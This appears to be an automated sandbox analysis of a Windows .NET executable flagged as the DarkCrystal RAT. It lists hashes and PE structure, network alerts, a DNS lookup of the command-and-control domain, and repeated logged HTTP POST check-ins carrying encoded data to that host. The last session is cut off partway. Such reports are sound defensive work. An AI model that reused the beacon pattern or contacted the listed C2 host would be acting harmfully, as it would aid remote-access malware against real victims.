                                                                                    Preview:..Pinging 051829 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                    File type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                    Entropy (8bit):7.974265283144141
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:JNKHlxGvw4.exe
                                                                                    File size:1'560'958 bytes
                                                                                    MD5:6689bd9a5c795eedc631e5fbb850b7ff
                                                                                    SHA1:b63d8e25d4eb9abea3ed0f7867f70db2ab18cba2
                                                                                    SHA256:cb4626ad921c63113e18c3aefb109f70c8e334089871133ea675d62d836d810b
                                                                                    SHA512:ff51ccd8918344bb0439a4d9e39394383bff2196496d778db9a3d2862479e55f1bf59c7d467ff055c721231cb592c3c7ded63c5af28a3f9552dc6421dd1151bf
                                                                                    SSDEEP:24576:K17t7ROjwJqMAVS2hEijP79eAPkavlCCyYcBoZ11q8UuZPt5PsuWg:KBt7R0wJ4L5Uw5lCCyG31oIPmg
                                                                                    TLSH:DD7533E8CE1DC6F8FEFB4D3C222B92A25565C1497D516F6B8020514BEEFB04A1E77290
                                                                                    File Content Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`.............................
                                                                                    Icon Hash:90cececece8e8eb0
                                                                                    Entrypoint:0x402e5e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x4D0126C5 [Thu Dec 9 18:58:13 2010 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e0c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x320 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xe64 | 0x1000 | 0baf8508519d41cdff0b3d392bf7f161 | False | 0.550048828125 | data | 5.290703402026259 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x4000 | 0x320 | 0x400 | 574e65dbca3f3dca430748b98fa97b40 | False | 0.3505859375 | data | 2.6411336922484443 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6000 | 0xc | 0x200 | e639c4c7bda1e10d4056215b438c51f7 | False | 1.001953125 | data | 6.527052376530866 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x4058 | 0x2c8 | data | | | 0.46207865168539325

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T18:55:24.716612+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49741 | 104.21.16.1 | 80 | TCP
2024-12-10T18:56:30.482340+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49762 | 104.21.16.1 | 80 | TCP
2024-12-10T18:56:38.609309+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49763 | 104.21.16.1 | 80 | TCP
2024-12-10T18:56:46.794894+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49764 | 104.21.16.1 | 80 | TCP
2024-12-10T18:56:55.060545+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49765 | 104.21.16.1 | 80 | TCP
2024-12-10T18:57:10.451235+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49766 | 104.21.16.1 | 80 | TCP
2024-12-10T18:57:18.873049+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49768 | 104.21.16.1 | 80 | TCP
2024-12-10T18:57:34.810568+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49770 | 104.21.16.1 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 18:55:22.854283094 CET | 51872 | 53 | 192.168.2.4 | 1.1.1.1
Dec 10, 2024 18:55:23.355797052 CET | 53 | 51872 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 18:55:22.854283094 CET | 192.168.2.4 | 1.1.1.1 | 0x7858 | Standard query (0) | 188387cm.n9shteam.in | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 18:55:23.355797052 CET | 1.1.1.1 | 192.168.2.4 | 0x7858 | No error (0) | 188387cm.n9shteam.in | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:55:23.355797052 CET | 1.1.1.1 | 192.168.2.4 | 0x7858 | No error (0) | 188387cm.n9shteam.in | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:55:23.355797052 CET | 1.1.1.1 | 192.168.2.4 | 0x7858 | No error (0) | 188387cm.n9shteam.in | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:55:23.355797052 CET | 1.1.1.1 | 192.168.2.4 | 0x7858 | No error (0) | 188387cm.n9shteam.in | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:55:23.355797052 CET | 1.1.1.1 | 192.168.2.4 | 0x7858 | No error (0) | 188387cm.n9shteam.in | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:55:23.355797052 CET | 1.1.1.1 | 192.168.2.4 | 0x7858 | No error (0) | 188387cm.n9shteam.in | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:55:23.355797052 CET | 1.1.1.1 | 192.168.2.4 | 0x7858 | No error (0) | 188387cm.n9shteam.in | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
                                                                                    • 188387cm.n9shteam.in
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49741 | 104.21.16.1 | 80 | 1432 | C:\Recovery\USZqVcJFLA.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 18:55:23.500654936 CET | 289 | OUT | POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
Dec 10, 2024 18:55:23.877057076 CET | 344 | OUT | Data Raw: 05 07 01 06 06 0f 01 03 05 06 02 01 02 02 01 0a 00 0a 05 0b 02 01 03 0d 01 56 0c 0c 07 02 01 53 0d 53 04 0c 02 03 04 01 0e 04 07 05 07 0a 06 01 03 0a 0b 09 0d 55 06 57 04 07 07 07 04 55 07 5b 01 53 0e 00 00 0f 06 05 0e 04 0f 03 0a 0d 0c 01 05 03
                                                                                    Data Ascii: VSSUWU[SS\L~sy]wLiv[^hBqLcot~pwZ{cJoYfkToQwI^N}u~V@zm\L~be
Dec 10, 2024 18:55:24.604001045 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 10, 2024 18:55:24.871160030 CET | 1026 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:55:24 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCc4l8Mq4w8yasVGHIME8n3WQZ7Y%2BpBziQAakd4hvT8IZbrbE7zCVCgELsRBw3AAIL3xd3viH%2ByE0LTtPUaaz2ATjTKC5%2FGP4OWDbHdyNsBXkk3ojBR7vMEcb3yvNscdnbRSkMCajw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1b0dcd07c44f-EWR
                                                                                    alt-svc: h2=":443"; ma=60
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3191&min_rtt=1579&rtt_var=3817&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=633&delivery_rate=100821&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.2.4 | 49762 | 104.21.16.1 | 80

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 18:56:29.314385891 CET | 354 | OUT | POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 332
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:56:29.670130014 CET | 332 | OUT | Data Raw: 05 00 04 06 03 0d 01 0b 05 06 02 01 02 05 01 03 00 04 05 08 02 06 03 0a 00 51 0f 02 03 0f 01 00 0d 53 07 08 03 0d 03 0a 0c 53 04 03 04 01 05 55 04 50 0e 09 0d 05 06 0b 07 03 06 04 07 01 00 0e 01 03 0f 5e 00 07 04 04 0c 0e 0e 01 0d 00 0f 06 05 50
                                                                                    Data Ascii: QSSUP^P^ZRUTQSR\L~|^i[vaj^aKUT||uMthLk`|JolUHzpWX|mp@cYQ^ie~V@x}~Oy\_
                                                                                    Dec 10, 2024 18:56:30.400499105 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:56:30.662179947 CET | 1028 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:56:30 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tUvEIZRzSEEz4FbcwiFrqgWL7YPd7YZKCaPku%2FJJJCnhIWRVvC88pkScHX0QqHcwZ2%2FNP5eKgf7O%2B00SuaOGM93bk7ZrnVGM017pY9335jBgUanXY6EGH2wY2mMU0BBAUWcExi9kuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1ca90ab678d6-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3531&min_rtt=1806&rtt_var=4128&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=686&delivery_rate=93535&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    2 | 192.168.2.4 | 49763 | 104.21.16.1 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 10, 2024 18:56:37.358515024 CET | 337 | OUT | POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:56:37.716890097 CET | 344 | OUT | Data Raw: 00 0b 01 00 06 0e 01 04 05 06 02 01 02 07 01 0a 00 05 05 08 02 05 03 0d 03 05 0f 00 07 0f 02 05 0c 06 06 01 02 50 04 05 0b 03 05 0a 04 07 02 04 03 0a 0f 0d 0c 04 07 0a 04 57 05 54 06 0b 07 0b 01 0b 0f 0d 05 0e 04 09 0c 0e 0c 02 0a 07 0e 03 05 07
                                                                                    Data Ascii: PWTQ\L~Nhcztrr\vK^@f_`Uw_|s`K{BpZl`iZkh@cww]ju~V@AzmnA}be
                                                                                    Dec 10, 2024 18:56:38.461564064 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:56:38.697223902 CET | 1035 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:56:38 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BDfsCJLI4TlbxCD4EPrlBkRXEANjCs7cA5SWCBCgTd%2F8SvhKrR4Cvs3X9HYFgPw8COGTjp0GfUQFYBLmnw7Ryha9AweJ1%2BJAjYrj9YvEk%2Bh56Mm8%2Fzyp22VADf6IXr8HVZPtmg5dQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1cdb6eaf42ef-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=15154&min_rtt=10362&rtt_var=13470&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=29978&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    3 | 192.168.2.4 | 49764 | 104.21.16.1 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 10, 2024 18:56:45.593123913 CET | 336 | OUT | POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:56:45.951365948 CET | 344 | OUT | Data Raw: 00 06 01 05 06 0f 01 05 05 06 02 01 02 0c 01 03 00 01 05 0b 02 00 03 0b 02 05 0a 04 07 07 01 55 0c 05 03 00 02 54 05 02 0c 01 04 01 05 56 02 01 03 0a 0b 0a 0c 0e 07 0a 07 00 04 50 07 06 06 0e 02 07 0e 59 07 03 07 06 0c 02 0b 01 0a 00 0f 08 04 00
                                                                                    Data Ascii: UTVPYVVVW\L}U|`a]`an\aftkUuw`h`kZx|`Yop~kSttgc^}O~V@x}~L~r}
                                                                                    Dec 10, 2024 18:56:46.684093952 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:56:46.939001083 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:56:46 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XoriqbBOB%2BCnBJAgk1lEQ7zc2ueqGZthy0NIwZQh0Zv8mB0cHrZs%2FG7xwvZdK0CTWOsYpC%2B1WX%2FIOoNWFCDauGa4Om02vXkwCcpriwBN%2BPKJWeVHP2cfwKwBTBRkcXjuzOBECwh3zg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1d0ecd044356-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3115&min_rtt=1607&rtt_var=3620&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=680&delivery_rate=106740&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    4 | 192.168.2.4 | 49765 | 104.21.16.1 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 10, 2024 18:56:53.803957939 CET | 337 | OUT | POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:56:54.154683113 CET | 344 | OUT | Data Raw: 05 02 04 03 06 0d 04 07 05 06 02 01 02 0c 01 06 00 07 05 0e 02 0c 03 09 01 01 0d 56 05 03 03 52 0d 51 07 59 03 04 04 0a 0e 51 06 05 07 50 07 0e 04 07 0e 5e 0e 05 07 03 05 57 07 54 07 07 07 58 03 0a 0e 0c 00 00 01 04 0e 54 0f 03 0d 04 0d 02 04 04
                                                                                    Data Ascii: VRQYQP^WTXTT[\L~~sj`\mueUPhUv^cUthZk_y|]Jxpfnttgk^ie~V@{mfru
                                                                                    Dec 10, 2024 18:56:54.903166056 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:56:55.156069994 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:56:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGiJxCFXy2nr0giY%2BiuZ7mHxecmuJMOKctQc9gJobJeuBRy%2BSjzBzztVtrdHA8Nw5JiSvAjcES7x3M1K173x9d%2FGRCfDFGyEurdTSxx4%2FT1OPAInsGHaIlrTTwy2PmM5ZJoY%2FtjYSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1d422992c44f-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3199&min_rtt=1734&rtt_var=3580&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=108501&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    5 | 192.168.2.4 | 49766 | 104.21.16.1 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 10, 2024 18:57:09.316735029 CET | 301 | OUT | POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
